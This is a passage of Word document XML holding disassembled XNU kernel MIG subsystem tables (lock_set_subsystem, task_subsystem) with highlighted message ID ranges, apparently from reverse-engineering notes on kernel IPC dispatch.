    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 3B9DC0h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 2FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dq 2Ch                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRPr="00ED4A5C" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E71757" w:rsidRDefault="00ED4A5C" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00ED4A5C">
        <w:rPr>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04958                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="005133F0" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>lock_set_subsystem</w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>_const:FFFFFF8000E03310                 public lock_set_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310 ; const lock_set_subsystem lock_set_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03310 lock_set_subsystem_0 dq offset lock_set_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                                         ; DATA XREF: lock_set_server_routine:loc_FFFFFF800039F4D2o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                                         ; lock_set_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03310                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>96A28h</w:t>
      </w:r>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">               ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E03310                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">96A2Eh </w:t>
      </w:r>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">              ; end</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 2Ch                  ; maxsize</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; reserved</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq offset _Xlock_acquire; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 2                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 2Ch                  ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 39F66000000000h      ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0FFFFFF80h           ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 2                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 db 2Ch, 3 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 2Ch                  ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>__const:FFFFFF8000E03310                 dd 39F7C0h              ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0FFFFFF80h           ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 2                    ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 2C00000000h          ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 39F920h              ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 2FFFFFF80h           ; routine.arg_descr</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.max_reply_msg</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 db 4 dup(0)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 0                    ; routine.impl_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dq 2Ch                  ; routine.stub_routine</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.argc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005133F0" w:rsidRPr="005133F0" w:rsidRDefault="005133F0" w:rsidP="005133F0">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005133F0">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E03310                 dd 0                    ; routine.descr_count</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00ED4A5C" w:rsidRDefault="00D060FE" w:rsidP="00ED4A5C">
      <w:pPr>
        <w:pStyle w:val="Heading5"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">task_subsystem </w:t>
      </w:r>
      <w:r w:rsidR="00ED4A5C">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                 public task_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08 ; const task_subsystem task_subsystem_0</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08 task_subsystem_0 dq offset task_server_routine; server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                                         ; DATA XREF: task_server_routine:loc_FFFFFF80003BAF42o</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>__const:FFFFFF8000E04B08                                         ; task_server+80o ...</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04B08                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">0D48h   </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">             ; start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D060FE" w:rsidRPr="00D060FE" w:rsidRDefault="00D060FE" w:rsidP="00D060FE">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">__const:FFFFFF8000E04B08                 dd </w:t>
      </w:r>
      <w:r w:rsidRPr="00D060FE">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>0D72h</w:t>
